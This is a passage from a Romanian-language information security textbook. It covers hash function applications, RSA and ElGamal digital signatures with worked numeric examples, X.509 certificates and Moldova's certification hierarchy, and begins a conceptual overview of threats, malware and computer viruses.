exemplu Bcrypt, Scrypt sau PBKDF2.
În 2013, a fost anunțat un concurs pentru a alege un nou algoritm standard pentru hash-ul
parolelor, iar câștigătorul, selectat în iulie 2015, a fost un nou algoritm de extindere a cheii, argon2.
În iunie 2017, NIST a emis o nouă revizuire a regulilor privind autentificarea digitală, NIST SP
800-63B-3, în care se spune că parolele trebuiesc memorate într-o formă rezistentă la atacurile
offline, cu adăugare de sare și cu aplicarea unei funcții hash potrivite.
Protocoale proof-of-work (ce ar putea fi tradus ca dovada muncii) reprezintă o măsură
economică pentru a descuraja atacurile de tip „denial-of-service” și alte abuzuri legate de servicii,
cum ar fi spamul într-o rețea, care necesită o anumită activitate de la solicitantul serviciului, care se
exprimă de obicei prin consumarea timpului de procesare a uni calculator. O caracteristică cheie a
acestor scheme este asimetria acestora: activitatea trebuie să fie moderat dificilă (dar fezabilă)
pentru solicitant, și în același timp ușor de verificat pentru furnizorul de servicii. Proof-of-work se
folosește în rețeaua Bitcoin pentru a securiza diverse aspecte prin a face (artificial) costisitoare
validarea tranzacțiilor pentru utilizatorii din rețea utilizând funcțiile hash.
Identificarea fișierelor de asemenea poate fi realizată cu ajutorul funcțiilor hash într-un mod
fiabil. Mai multe sisteme de gestionare a codurilor sursă, inclusiv Git, Mercurial și Monotone,
utilizează hash-ul SHA-1 a diferitor tipuri de conținut (conținutul fișierelor, ierarhia de directoare,
informațiile despre origine etc.) pentru a le identifica în mod unic. Hash-urile sunt folosite pentru a
identifica fișiere pe rețelele de partajare a fișierelor peer-to-peer. De exemplu, într-o conexiune
ed2k, hash-ul generat de algortimul MD-4 este combinat cu dimensiunea fișierului, furnizând
suficiente informații pentru localizarea surselor fișierelor, descărcarea fișierului și verificarea
conținutului său.
Una dintre principalele aplicații ale unei funcții hash obișnuite este de a permite căutarea
rapidă a datelor în tabelele de dispersie2. Funcțiile hash criptografice pot realiza foarte bine acest
lucru.
Cu toate acestea, în comparație cu funcțiile hash standard, funcțiile hash criptografice tind să
fie mult mai scumpe din punct de vedere computațional. Din acest motiv ele tind să fie folosite în
contexte în care este necesar ca utilizatorii să se protejeze împotriva posibilității de falsificare

2
Un tabel de dispersie sau tabel hash este o structură de date care implementează interfața unui tablou asociativ, și
anume: permite stocarea perechi (cheie, valoare) și efectuarea a trei operații: adăugarea unei perechi noi, căutarea și
ștergerea perechii după cheia cunoscută.
8
(crearea de date cu același hash ca și datele așteptate) de către participanții potențialii rău
intenționați.
Funcțiile hash pot fi de asemenea utilizate pentru generarea de biți pseudoaletori sau pentru
a obține chei noi sau parole dintr-o singură cheie sau parolă securizată.

8.2. Semnături digitale


Sistemele de criptare cu cheie secretă sau publică ne asigură nivelul cerut de
confidențialitate a informației, verificarea integrității poate fi realizată cu utilizarea funcțiilor hash,
în timp ce autenticitatea poate fi asigurată cu o primitivă criptografică, numită semnătură digitală.

8.2.1. Noțiuni generale și proprietăți ale semnăturii digitale


Semnătura digitală (sau electronică) este o schemă matematică pentru demonstrarea
autenticităţii unui mesaj sau document electronic. O semnătură digitală validă este un motiv de
încredere pentru destinatarul mesajului că acest mesaj a fost creat de către un expeditor cunoscut,
astfel încât el nu va putea nega faptul trimiterii mesajului (autentificarea şi non-repudierea) și că
mesajul nu a fost modificat în drum (integritatea). Semnăturile digitale sunt în general utilizate
pentru distribuţia de software, în tranzacţiile financiare, precum și în alte cazuri în care este
importantă detectarea eventualei falsificări sau manipulări.
Semnătura electronica nu este o semnătură scanată, o pictogramă, o poză sau o hologramă şi
nici nu este un smart-card.
O schemă de semnătură digitală se bazează pe trei algoritmi:
 algoritmul de selectare aleatoare a unei chei private care se va asocia unei chei
publice;
 algoritmul de semnare care, aplicat unei chei private şi unui document digital,
generează semnătura digitală;
 algoritmul de verificare a semnăturii digitale, care aplicat cheii publice şi semnăturii
digitale, acceptă sau respinge mesajul de conformitate.
Semnăturile digitale reprezintă echivalentul electronic al semnăturilor de mână, acest
concept fiind introdus ca funcţionalitate adiţională a sistemelor de criptare cu cheie publică de către
Diffie şi Hellman în 1976, în absenţa unei scheme criptografice pentru acest scop. Obiectivul
principal de securitate pe care îl asigură semnăturile digitale îl reprezintă non-repudierea, şi anume
faptul că o entitate odată ce a semnat o informaţie nu poate nega că a emis acea informaţie şi orice
altă entitate neutră poate verifica acest lucru. Semnăturile digitale reprezintă deci o valoare
numerică care leagă conţinutul unui mesaj de identitatea unei entităţi. În principiu, orice algoritm
asimetric poate fi utilizat pentru crearea unei semnături digitale prin inversarea rolului cheii publice
cu cea privată, iar primele propuneri de semnături digitale se găsesc în lucrările lui Rivest, Rabin şi

9
ElGamal. Trebuie de subliniat că şi algoritmi simetrici pot fi folosiţi pentru a crea semnături digitale
de tip one-time dar acestea sunt rar utilizate în practică.
Pentru o semnătură digitală sunt necesare două proprietăţi-cerințe de bază:
 în primul rând, o semnătură generată dintr-un mesaj fix și o cheie fixă privată ar
trebui să verifice autenticitatea acestui mesaj utilizând cheia publică
corespunzătoare;
 în al doilea rând, ar trebui să fie imposibil de generat o semnătură validă pentru o
entitate care nu posedă cheia privată.
Alte câteva proprietăţi ale semnăturilor digitale sunt:
 trebuie să fie uşor de calculat doar de către cel care semnează mesajul (funcţia de
semnare trebuie să fie uşor de calculat);
 trebuie să fie uşor de verificat de către oricine (funcţia de verificare trebuie să fie
uşor de calculat);
 trebuie să deţină o durată de viaţă corespunzătoare, adică semnătura să nu poată fi
falsificată până când nu mai este necesară scopului în care a fost creată.
Să precizăm încă o dată cele trei motive principale pentru care se recomanda folosirea
semnăturilor digitale.
Autenticitatea. Deşi documentele digitale pot să includă informaţii despre identitatea celui
care le-a emis, aceste informaţii pot să nu fie corecte. Semnătura digitală poate fi folosită pentru
autentificarea sursei documentului. Atunci când dreptul de proprietate asupra unei semnături
digitale aparţine unei anumite persoane, semnătura digitală arată că documentul a fost eliberat de
către acea persoană. Importanţa acestui aspect apare în dovedirea autenticităţii documentelor
digitale în context financiar-contabil. De exemplu actele contabile ale unei firme sunt trimise corect
de către firma de contabilitate către administratorul firmei. Daca acesta va modifica aceste acte
încercând să schimbe informaţiile financiare sau orice fel de informaţii transmise ca fişier PDF/A3
semnat electronic, pentru a putea obţine un credit de la o bancă, în momentul în care banca deschide
acele documente, semnătura electronică va fi invalidată, deci firma de contabilitate nu va putea fi
considerată responsabilă de conţinutul documentului, persoana care a transmis documentul
modificat nu va putea fi urmărită în justiţie pentru fals şi uz de fals, iar banca va fi asigurată că nu
cade în capcana acordării unui credit pe baza unor documente false.
Integritatea. Semnătura digitală aplicată unui document electronic reprezintă o garanţie a
integrităţii documentului atunci când este validată de o autoritate publică. Cheia aleatoare se creează

3
PDF/A este o versiune standardizată ISO a documentului portabil (PDF) specializat pentru utilizarea în arhivarea și
păstrarea pe termen lung a documentelor electronice. PDF/A diferă de PDF prin interzicerea unor caracteristici
necorespunzătoare pentru arhivarea pe termen lung, cum ar fi legarea fontului (spre deosebire de încorporarea
fonturilor) și criptarea.
10
pe baza unor criterii multiple care includ printre altele şi detalii despre conţinutul documentului.
Orice modificare a conţinutului unui document digital înseamnă o cheie aleatoare nouă diferită de
cheia aleatoare folosită pentru aplicarea semnăturii digitale. În clipa în care se solicită validarea
documentului cele două chei aleatoare vor fi diferite, iar documentul se va putea considera ca având
conţinutul alterat.
Imposibilitatea repudierii (non-repudiere). Odată ce este emis un document digital semnat
electronic, atâta vreme cât semnătura electronică este validă pe documentul digital, autorul
documentului nu îşi poate declina răspunderea pentru conţinutul documentului cu semnătura
electronică validă. În plus, nu poate nega faptul că documentul a fost semnat personal, deoarece
legislaţia în vigoare prevede faptul că deţinătorul unei semnături digitale nu are dreptul să
înstrăineze sau împrumute token-ul (dispozitivul criptografic) pe care există certificatul digital
calificat pe care îl deţine. Din acest punct de vedere, exemplul de mai sus în care firma de
contabilitate transmite documentele financiare firmei pentru care le întocmeşte, dacă a comis greşeli
în întocmirea acestor acte, rămâne responsabilă pentru datele prezentate, câta vreme documentul
digital transmis poartă o semnătură validă.
Pentru o semnătură digitală a mesajului m de către entitatea A putem folosi notaţia S, SA(m)
sau SigA(m).
Există două categorii distincte de semnături digitale: semnături digitale cu recuperarea
mesajului și semnături digitale cu anexă
La utilizarea semnăturilor digitale din prima categorie mesajul poate fi recuperat direct din
semnătura digitală. Cel mai simplu exemplu de construcţie este prin inversarea rolului cheii publice
şi celei private în cazul schemei RSA. Pentru a evita fraudarea lor este obligatorie aplicarea unei
funcţii de redundanţă4 asupra mesajului după care semnătura propriu-zisă se aplică asupra mesajului
redundant.
Semnături digitale cu anexă (sau cu apendice, figura 8.4) sunt semnături digitale din care
mesajul nu poate fi recuperat, și este trimis adiţional ca anexă la semnătura digitală. Acestea se pot
construi uşor prin aplicarea unei funcţii hash asupra mesajului şi criptarea hash-ului obţinut.
Datorită eficienţei computaţionale în semnarea mesajelor de dimensiuni mari (deoarece se
semnează efectiv doar hash-ul mesajului care are o lungime fixă pentru fiecare algoritm hash
indiferent de lungimea mesajului), aceste semnături sunt cele mai utilizate în practică. Totodată
orice semnătură digitală cu recuperarea mesajului poate fi uşor convertită în semnătură cu anexă.

4
În informatică, redundanța reprezintă un excedent de semnale pentru transmiterea fidelă a unei cantități de informație.
11
Figura 8.4. Schema unei semnături digitale fără criptarea mesajului

În cazul în care este importantă și confidențialitatea documentului electronic semnat, atunci


schema pentru semnătura cu apendice se completează, după aplicarea algoritmului hash, cu
criptarea fișierului electronic prin utilizarea de obicei a unui algoritm simetric, pentru care ambii
participanți dispun de o cheie comună. La verificare destinatarul va decripta mai întâi fișierul cu
același algoritm de criptare simetrică, apoi va urma aceiași pași ca și în versiunea precedentă.
Semnăturile digitale de asemenea pot fi clasificate în semnături deterministe respectiv
randomizate după cum algoritmul de semnare foloseşte valori aleatoare şi nu returnează aceeaşi
semnătură pentru acelaşi mesaj de fiecare dată.
O altă clasificare a algoritmilor de semnătură mai poate fi în algoritmi de unică folosinţă
(one-time) sau pentru folosire multiplă (multiple-time).
Să analizăm în continuare câteva dintre schemele de semnătură digitală aplicate în prezent.

8.2.2. Schema de semnătură RSA


Algoritmul de generare a semnăturii digitale RSA este același ca și algoritmul obișnuit de
criptare RSA, cu unele particularități. Fie Bob – posesorul perechii de chei publice PKB și private
SKB pentru RSA.
a) pentru a utiliza aceste chei la criptare se procedează astfel:
 oricine dorește folosește PKB pentru a cripta și a-i transmite lui Bob informația
criptată;

12
 doar Bob, adică posesorul cheii privare, poate decripta informația primită utilizând
SKB.
b) pentru semnătura digitală procedeul e următorul:
 pentru a semna un document, Bob îi calculează mai întâi valoarea hash, apoi
criptează această valoare cu cheia lui privată SKB, rezultând semnătura digitală a
acestui document; apoi Bob transmite destinatarului documentul cu semnătura
obținută;
 pentru a verifica semnătura ea trebuie decriptată cu cheia publică a lui Bob PKB,
obținând valoarea hash a documentului.
Schema semnăturii digitale pentru o entitate A constă din următoarele etape:
1. Generarea cheilor. Această etapă nu se deosebește de etapa similară a algoritmului de
criptare RSA. În rezultatul ei se obține perechea de chei a entităţii A: cheia publică este
perechea (e, n) și cheia privată este d sau (d, n).
2. Generarea semnăturii. Entitatea A execută următoarele:
 calculează S = [H(m)]d modn, unde H este o funcţie hash;
 semnătura mesajului m este S.
3. Verificarea semnăturii. Pentru a verifica semnătura S a mesajului m, entitatea B execută
următoarele:
 obţine cheia publică autentică (e, n) a entităţii A;
 calculează H1=Semodn şi H2 = H(m)modn, utilizând aceeași funcție hash; în cazul în
care H1 = H2 semnătura e verificată, în caz contrar înseamnă că s-a întâmplat ceva în
canalul de comunicaţii sau A vrea să-l înşele pe B.
Exemplu. De generat cheile și de semnat mesajul m aplicând schema RSA, dacă se cunoaște
valoarea zecimală a funcției hash: H(m)=130.
1. Generarea cheilor:
 fie p = 53 şi q = 61, două numere prime secrete ale lui A;
 se calculează n =5361=3233 şi φ(n)=(p–1)(q–1)=5260=3120;
 se alege o cheie secreta d = 71 (cmmdc(71, 3120) = 1);
 se calculează cheia publică e = 791 (71d = 1 mod 3120);
2. Generarea semnăturii:
 deoarece se cunoaște H(m)=130, putem semna documentul:
S = [H(m)]d = (13071) mod 3233 = 1883;
 semnătura electronică obţinută este S = 1883;
 Se transmite S obţinut la pasul anterior şi m (textul clar – fără secretizare).

13
3. Verificarea semnăturii: B primeşte pachetul S şi m, după care calculează H(m) în două
moduri şi le va compara:
 va calcula H(m) cu cheia publică a lui A:
H1=Se = (188371) mod 3233 = 130;
 va calcula H(m) prin aplicarea aceleași funcții hash ca și A și va obține
H2 = H(m) = 130;
 H1 = H2, deci semnătura este validă.
Aici mai trebuie de menționat că nu vom avea situații precum la criptarea RSA, care să ne
impună să divizăm valoarea hash în segmente cu valori mai mici ca n, deoarece în conformitate cu
standardele în vigoare valoarea lui n este mai mare decât valoarea funcției hash.

8.2.3. Schema de semnătură ElGamal


Această schemă a fost propusă de ElGamal împreună cu schema de criptare cu chei publice,
diferențele aici sunt puțin mai mari.
1. Generarea cheilor. Fiecare entitate generează cheia publică şi cheia privată corespunzătoare.
Entitatea A execută următoarele:
 generează un număr prim mare p şi un generator α al grupului multiplicativ Zp*;
 selectează aleator un număr întreg a astfel încât 1 ≤ a ≤ p–2;
 calculează y = α a mod p.
 cheia publică a entităţii A este (p, α, y); cheia privată este a.
2. Generarea semnăturii. Entitatea A semnează un mesaj m de o lungime arbitrară.
Pentru aceasta, entitatea A execută următoarele:
1. selectează aleator un număr întreg secret k, 1 ≤ k ≤ p –2, astfel încât
cmmdc(k, p –1) = 1;
2. calculează r = αk mod p şi k –1 mod (p –1);
3. calculează s = k –1 (H(m) – ar) mod (p –1), unde H este o funcţie hash;
4. semnătura mesajului m este perechea (r, s).
3. Verificarea semnăturii. Pentru a verifica semnătura (r, s) a mesajului m, entitatea B execută
următoarele:
1. obţine cheia publică autentică (p, α, y) a entităţii A ;
2. verifică dacă 1 ≤ r ≤ p –1 (dacă această inegalitate nu are loc, semnătura (r, s) nu e
validă);
3. calculează v1  y r r s mod p;
4. calculează H(m) şi v2   H ( m) mod p, unde H este funcţia hash aplicată la semnare;
5. semnătura (r, s) este acceptată dacă şi numai dacă v1 = v2.

14
Exemplu. De generat cheile și de semnat mesajul m aplicând schema ElGamal, dacă se cunoaște
valoarea zecimală a funcției hash: H(m) =1463.
1. Generarea cheilor:
 A generează numărul prim p=2357 şi generatorul α=2 al grupului Z*2357;
 A alege cheia privată a = 1751 şi calculează
y = αa mod p = 21751 mod 2357 = 1185.
 cheia publică a lui A este (p = 2357, α = 2, y = 1185),
iar cheia sa privată este a = 1751.
2. Generarea semnăturii:
 pentru a semna mesajul m cu H(m) =1463, A selectează aleator un întreg k =1529,
calculează
r   k mod p  21529 mod 2357 = 1490 şi
k –1 mod (p –1) = 245;
 apoi A calculează
S=245(1463–17511490) mod 2356=1777.
Semnătura mesajului m = 1463 este perechea (r =1490, s =1777);
3. Verificarea semnăturii:
 pentru verificarea semnăturii, B calculează
v1  1185 1490 1490 1777mod 2357  1072 ,

H(m) =1463 (utilizând aceeași funcție hash ca și A),


v2   H ( m ) mod p = 21463 mod 2357=1072;
 Entitatea B acceptă semnătura deoarece v1 = v2.

8.2.4. Certificate digitale


Aplicarea semnăturii digitale în viața reală nu se face prin efectuarea acestor calcule de către
cel care semnează sau verifică, calculele fiind făcute automat prin intermediul instrumentelor
software sau hardware respective, iar semnătura digitală este asigurată de un certificat digital.
În criptografie, un certificat digital, cunoscut și sub denumirea de certificat al cheii publice
sau certificat de identitate, este un document electronic folosit pentru a demonstra dreptul de
proprietate asupra unei chei publice. Certificatul include informații despre cheie, informații despre
identitatea proprietarului său (numit subiect sau deţinător) și semnătura digitală a unei entități care a
verificat conținutul certificatului (numit emitent). Dacă semnătura este validă și software-ul care
examinează certificatul are încredere în emitent, atunci poate utiliza acea cheie pentru a comunica
în siguranță cu deţinătorul certificatului.

15
În criptarea pe e-mail, la semnarea codului sau în sistemele de semnături electronice,
deţinătorul unui certificat este de obicei o persoană sau o organizație. Cu toate acestea în TLS5
subiect al certificatului este de obicei un computer sau un alt dispozitiv, deși certificatele TLS pot
identifica organizații sau persoane fizice în plus față de rolul principal în identificarea
dispozitivelor.
Similar conceptului de carte de identitate sau paşaport, unde dreptul de a emite un astfel de
document revine unei singure autorităţi la nivel naţional în baza unor documente prezentate de
solicitant, un certificat digital este emis de anumite entităţi denumite autorităţi de certificare. O
astfel de autoritate, pentru a fi acreditată, trebuie să îndeplinească reguli stricte, astfel încât un
certificat emis de ea să reprezinte un grad ridicat de încredere.
Certificatele digitale sunt emise conform standardului ITU X.509 versiunea 3 descris prin
RFC 2459, „Internet X.509 Public Key Infrastructure Certificate and CRL Profile”. Un certificat
digital conţine în principiu următoarele informaţii (figura 8.5):
 versiunea, seria, identificatorul certificatului;
 numele şi adresa de email a deţinătorului (persoană fizică sau juridică);
 adresa URL a server-ului care utilizează certificatul respectiv;
 cheia publică a deţinătorului și algoritmul cheii publice;
 numele autorităţii de certificare ce a emis certificatul digital;
 seria certificatului digital;
 valabilitatea certificatului digital (data de început şi data de sfârşit);
 unele informații opționale: identificatorul unic al emitentului, identificatorul unic al
subiectului, extensii.

5
Transport Layer Security (TLS) și Secure Sockets Layer (SSL), predecesorul său, sunt protocoale criptografice care
permit comunicații sigure pe Internet. Între SSL 3.0 și TLS 1.0 există anumite diferențe, dar protocolul rămâne
aproximativ același. Termenul „SSL” folosit aici se poate referi la ambele protocoale, excepție făcând cazurile
specificate explicit în context. Utilizarea tehnologiei SSL oferă un grad mai mare de confidențialitate și de siguranță
decât o conexiune web criptată. Aceasta reduce riscul ca informațiile să fie interceptate și utilizate incorect.
16
Figura 8.5. Informații generale și detaliate ale uni certificat digital

Certificatele digitale sunt în general utilizate pentru:


 autentificarea şi criptarea informaţiilor între servere şi browsere web;
 autentificarea şi criptarea conexiunilor într-o reţea locală – LAN;
 autentificarea şi criptarea mesajelor trimise prin email în cadrul unei reţele locale sau
între terţi;
 autentificarea şi criptarea conexiunilor între servere;
Certificatele digitale pot fi de mai multe tipuri:
 de uz intern – sunt utilizate în cadrul reţelelor locale aparţinând unor companii şi nu
pot fi utilizate în relaţii cu terţii deoarece nu sunt emise de autorităţi de certificare
acreditate;
 certificatele cu autentificare pe domeniu – la emiterea unui certificat Autoritatea de
Certificare verifică numai faptul că cel ce a depus cererea de emitere deţine domeniul
respectiv;
 certificate cu autentificare totală – sunt acordate de o autoritate de certificare numai
după verificări amănunţite cu privire la existenţa afacerii respective şi a deţinătorului
domeniului respectiv;
 certificate pentru semnarea aplicaţiilor software – sunt utilizate de companiile
producătoare de software la semnarea digitală a codurilor software pentru a preveni
compromiterea acestora cu aplicaţii malware atunci când sunt downloadate de pe
Internet;

17
 certificate cu validare extinsă – reprezintă certificatele digitale cu cel mai înalt nivel
de încredere posibil.
Cel mai comun format pentru certificatele de chei publice este definit de X.509. Deoarece
X.509 este foarte general, formatul este constrâns în continuare de profiluri definite pentru anumite
cazuri de utilizare, cum ar fi Infrastructura cheilor publice (X.509) așa cum este definită în RFC
5280.
În Republica Moldova certificarea cheilor publice este realizată de centrele de certificare. În
conformitate cu legislația în vigoare centrele de certificare se creează după principiul ierarhic, după
cum urmează:
 centrul de certificare de nivel superior - primul nivel;
 centrele de certificare care prestează servicii de certificare a cheilor publice terţelor
persoane - nivelul al doilea;
 centrele de certificare create în scopuri corporative, care nu prestează servicii de
certificare a cheilor publice terţelor persoane - nivelul al treilea.
Numărul centrelor de certificare de nivelul doi şi trei nu se limitează.
Centrul de certificare a cheilor publice de nivel superior a fost creat în cadrul Serviciului de
Informaţii şi Securitate al Republicii Moldova în conformitate cu Legea nr. 246 din 15.07.2004 cu
privire la documentul electronic şi semnătura digitală cu respectarea prevederilor Directivei Uniunii
Europene UE/EC/99/93 din 29 iunie 2006. El este pilonul de bază a infrastructurii cheilor publice în
Republica Moldova.
Având ca destinație principală certificarea cheilor publice ale prestatorului de servicii de
certificare în domeniul aplicării semnăturii electronice avansate calificate, Centrul de certificare a
cheilor publice de nivel superior îndeplineşte următoarele funcţii:
 certifică cheile publice ale prestatorilor de servicii de certificare în domeniul aplicării
semnăturii electronice avansate calificate;
 suspendă valabilitatea, repune în funcţiune şi revocă certificatele cheilor publice
emise de acest prestator;
 creează şi ţine registrul certificatelor cheilor publice ale prestatorului de servicii de
certificare în domeniul aplicării semnăturii electronice avansate calificate de nivelul
al doilea;
 confirmă autenticitatea şi valabilitatea certificatelor cheilor publice ale prestatorilor
de servicii de certificare în domeniul aplicării semnăturii electronice avansate
calificate.
Pornind de la funcţiile sale, Centrul de certificare a cheilor publice de nivel superior nu
oferă servicii în domeniul semnăturii electronice beneficiarilor finali. În acest sens, Centrul este

18
garant de legalitate şi de credibilitate în raporturile dintre centrele de certificare de nivelul doi şi
clienţii nemijlociţi ai acestora (persoane fizice şi juridice).
Centrele de certificare a cheilor publice de nivel doi sunt Centrul de Telecomunicaţii
Speciale (prin intermediul căruia se realizează și semnătura mobilă Moldcell sau Orange) și Centrul
de Certificare al Întreprinderii de Stat ”Fiscservinform”.

Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Care este deosebirea fundamentală dintre funcțiile hash obișnuite de cele
criptografice?
2. Enunțați și comentați trei aplicații ale funcțiilor hash criptografice.
3. Explicați principiul general de funcționare a semnăturii digitale.
4. Enunțați și comentați trei principii ale securității informației care sunt susținute de
semnătura digitală.
5. Modelați semnarea mesajului M=’Semnătură digitală’ aplicând algoritmii RSA și
ElGamal. Pentru funcția hash utilizați algoritmul CRC32.
6. Care sunt beneficiile utilizării certificatelor digitale și cum se realizează verificarea
acestor certificate?

19
TEMA 9: AMENINȚĂRI ȘI VULNERABILITĂȚI LA ADRESA SECURITĂȚII
INFORMAȚIEI

Obiectivele temei:
 Descrierea noțiunii de amenințare la adresa securității informației.
 Analiza tipurilor de software rău intenționat.
 Analiza tipurilor de atacuri informatice.
 Familiarizarea cu vulnerabilitățile de securitate și cu managementul vulnerabilităților.

Cuvinte-cheie:
ameninţare pentru programe spion,
securitatea informaţiei, atacuri informatice,
surse de amenințări, vulnerabilități,
viruși informatici, scanner de vulnerabilități.
viermi informatici,

Securitatea informației este obținută și menținută prin implementarea unui set adecvat de
politici, practici, proceduri, structuri organizaționale, instrumente hardware și aplicații software.
Aceste elemente trebuie implementate în măsura în care se asigură atingerea obiectivelor specifice
de securitate.
Este important ca fiecare organizație să poată să-și identifice propriile cerințe de securitate,
iar una dintre căile de a realiza acest lucru este evaluarea riscurilor, adică identificarea
amenințărilor asupra resurselor, evaluarea vulnerabilității la aceste amenințări și probabilitatea de
producere a lor, precum și estimarea impactului potențial.

9.1. Noțiune de amenințare la adresa securității informației


O ameninţare pentru securitatea informaţiei este o intenţie, acţiune, inacţiune, manifestată
real sau potenţial sau factor cu caracter ecologic, tehnic sau de alt gen, a căror realizare sau
dezvoltare contravine sau poate să contravină intereselor legale de bază ale persoanei, societăţii şi
statului în spaţiul informaţional.
Amenințările la adresa securității informațiilor pot fi clasificate în funcție de diferite criterii:
 după aspectul securității informațiilor:
o amenințări la adresa confidențialității;
o amenințări la adresa integrității;
o amenințări la adresa accesibilității;
 după localizarea sursei amenințării:
o amenințări interne (sursele amenințării se află în sistem);
o amenințări externe (sursele amenințării sunt în afara sistemului);
 după mărimea daunelor:
o amenințări generale (cauzează daune generale entității, provocând pagube
importante);
o amenințări locale (care provoacă daune anumitor părți ale entității);
o amenințări particulare (provoacă daune proprietăților individuale ale
elementelor entității);
 după gradul de influență asupra sistemului informatic:
o amenințări pasive (structura și conținutul sistemului nu se schimbă);
o amenințări active (structura și conținutul sistemului pot fi modificate).
 după natura de proveniență:
o amenințări naturale (obiective) - cauzate de impactul proceselor fizice
obiective sau al fenomenelor naturale care nu depind de voința omului;
o amenințări artificiale (subiective) - cauzată de impactul asupra sferei
informaționale a omului.
Amenințările artificiale, la rândul lor pot fi neintenționate sau intenționate.
Amenințările neintenționate (sau accidentale) sunt erori ale aplicațiilor software, erorile de
sistem, defecțiunile în tehnologia informatică și de comunicații, erori ale personalului.
Amenințările intenționate (sau deliberate) sunt accesul neautorizat la informații, dezvoltarea
de software special folosit pentru accesul ilegal, dezvoltarea și distribuția programelor software
malițioase etc. Amenințările intenționate sunt cauzate de acțiunile oamenilor, iar principalele
probleme ale securității informațiilor sunt asociate în primul rând cu aceste amenințări, deoarece
acestea constituie principala cauză a criminalității și a delincvenței.
Surse de amenințări pot fi persoane particulare, concurenți, infractori, funcționari corupți,
organe administrative și de conducere, etc. Sursele de amenințări urmăresc obiective cum sunt:
cunoașterea informațiilor protejate, modificarea lor în scopul obținerii de profit, distrugerea pentru
cauzarea daunelor materiale directe etc.
Sursele de amenințări pot fi împărțite în trei grupe principale:
 surse antropogene - subiecții ale căror acțiuni pot duce la o încălcare a securității
informațiilor, acțiuni care pot fi calificate drept infracțiuni intenționate sau accidentale;
aceste surse pot fi atât externe, cât și interne, ele pot fi prezise și pot fi luate măsuri
adecvate;
 surse tehnogene - mijloacele tehnice utilizare de subiecți; ele sunt mai puțin previzibile,
depind în mod direct de proprietățile tehnologiei și, prin urmare, necesită o atenție
deosebită; aceste surse de amenințări la adresa securității informațiilor pot fi, de
asemenea, interne sau externe;

2
 surse naturale - circumstanțele care constituie o forță insurmontabilă (calamități
naturale sau alte circumstanțe care nu pot fi prevăzute sau prevenite, sau pot fi
prevăzute, dar este imposibil de a le preveni), astfel de circumstanțe care au un caracter
obiectiv și absolut, care se aplică tuturor; aceste surse de amenințare nu pot fi anticipate
și, prin urmare, ar trebui întotdeauna aplicate măsuri împotriva lor; sursele naturale sunt
de obicei externe obiectului protejat, iar sub ele, sunt în general înțelese dezastre
naturale.

După cum am menționat mai sus amenințările intenționate constituie principala cauză a
criminalității și a delincvenței, iar cea mai numeroasă clasă de amenințări de acest fel este software-
ul rău intenționat.

9.2. Software-ul rău intenționat


Software-ul rău intenționat sau software-ul dăunător (sau malware - malicious software) este
un tip de software proiectat intenționat pentru deteriorarea unui calculator sau infiltrarea în el, sau/și
deteriorarea ori infiltrarea în întregi rețele de calculatoare, fără consimțământul proprietarului
respectiv. Noțiunea se utilizează generalizat de către informaticieni pentru a desemna orice formă
ostilă, intruzivă sau supărătoare de software sau cod de program.
Malware-ul este conceput în special pentru a obține acces la calculatorul unui proprietar
păcălindu-l pe acesta să instaleze un anumit software. El poate urmări ce anume accesează un
utilizator pe calculatorul său și poate provoca pagube pe care acesta s-ar putea să nu le
conștientizeze.
Malware-ul este văzut, de cele mai multe ori, sub formă de viruși, viermi, keyloggere,
spyware, etc. și poate fi utilizat pentru a fura informații sensibile sau a răspândi spamuri prin e-mail,
iar astăzi aceste programe înșelătoare mai sunt folosite pentru a genera venituri prin publicitate
forțată.
9.2.1. Virușii informatici
Virusul este un software, de regulă distructiv, proiectat pentru a infecta un sistem informatic.
Viruşii informatici sunt creaţi din diverse motive: un specialist vrea să-şi demonstreze abilităţile, o
firmă producătoare de software îşi protejează programele (activează un virus la copierea ilicită), o
firmă de software producătoare de antiviruşi lansează un virus pentru a-şi vinde produsele etc.
Virusul prezintă două caracteristici de bază: se auto-execută şi se auto-multiplică.
Mecanismul de activare verifică dacă s-a întâmplat un anumit eveniment sau o anumită
condiţie. Când aceasta are loc, virusul îşi execută obiectivul care de cele mai multe ori este unul
nedorit, distructiv pentru sistemul informatic. În funcţie de motivele autorului, un virus poate crea
daune imediat după execuţia lui sau poate aştepta până când are loc un anumit eveniment. În cazul
în care mecanismul de activare verifică dacă a fost atinsă o anumită dată calendaristică pentru a
3
executa virusul, putem spune că virusul este o bombă cu ceas (time bomb). Dacă se verifică
existenţa unei condiţii, ca de exemplu lansarea în execuţie a unui program de un anumit număr de
ori), putem numi virusul bombă logică (logic bomb). Astfel pot exista diferite mecanisme de
activare sau niciunul, în acest caz existând doar infectarea iniţială. O dată ce virusul a fost activat,
pot declanşa acţiuni devastatoare pentru un sistem cum ar fi ştergerea informaţiilor de pe sistemul
de stocare sau schimbarea tabelei de partiţii a hard disk-ului.
Iniţial virusul se află în interiorul unui program, strecurat printre instrucţiuni. Atât timp cât
programul nu este executat, virusul nu este activat. Odată ce acesta a fost activat, virusul încearcă să
se infiltreze printre instrucţiunile altor programe, contaminând întreg sistemul. Această acţiune
poartă numele de mecanism de replicare.
Mecanismul de replicare îndeplineşte următoarele funcţii:
 caută alte programe pentru a le infecta;
 verifică programul găsit dacă a mai fost infectat anterior după semnătura virusului;
 inserează instrucţiuni ascunse în interiorul programului;
 modifică secvenţa de execuţie a programului infectat astfel încât instrucţiunile ascunse
să fie executate ori de câte ori programul este apelat;
 creează o semnătură pentru a indica faptul că programul a fost infectat pentru a nu fi
infectat încă o dată.
Această semnătură a virusului este necesară pentru ca programele din interiorul sistemului
informatic să nu fie infectate în mod repetat, acest lucru ducând la creşterea dimensiunii
programelor şi automat la detecţia existenţei virusului. Mecanismul de replicare poate îndeplini şi
alte funcţii cum ar fi resetarea datei de modificare a documentului infectat la valoarea ei iniţială
(data la care a fost creat documentul) sau raportarea dimensiunii iniţiale a documentului şi nu pe cea
în urma infectării.
Viruşii informatici pot fi clasificaţi în funcţie de programul executabil în care se infiltrează
sau în funcţie de modalitatea lor de funcţionare.
În funcţie de programul executabil în care se infiltrează, există mai multe tipuri de viruşi:
 viruşi MBR (Master Boot Record) – sunt acei viruşi care infectează MBR-ul de pe hard
disk-uri; MBR-ul fiind sectorul care conţine un scurt program ce încarcă sistemul de
operare. Dacă acest sector este corupt, sistemul de operare nu se mai poate încărca;
 viruşi BS (Boot Sector) – sunt asemănători cu viruşii MBR, singura diferenţă fiind că
viruşii BS au ca ţintă dischetele, CD-urile sau DVD-urile;
 viruşi de fişiere – sunt viruşii ce infectează o anumită categorie de fişiere. De obicei sunt
